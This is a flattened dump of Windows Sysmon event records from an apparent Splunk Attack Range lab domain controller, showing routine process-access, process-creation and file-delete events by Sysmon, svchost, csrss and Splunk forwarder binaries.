10341000x8000000000000000108758Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.538{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108757Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.538{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108756Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.538{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108755Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.538{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108754Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.538{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B5ED-615A-9C02-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108753Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.538{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5ED-615A-9C02-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108752Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.539{58E9C193-B5ED-615A-9C02-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108751Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:06:05.254{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A946B5224CCFC4B113FD0BDD264B32,SHA256=D7B1576F67A02F7331C1D983B77AA29779FC8B905AB36410BDEE03FA5076BD47,IMPHASH=00000000000000000000000000000000falsetrue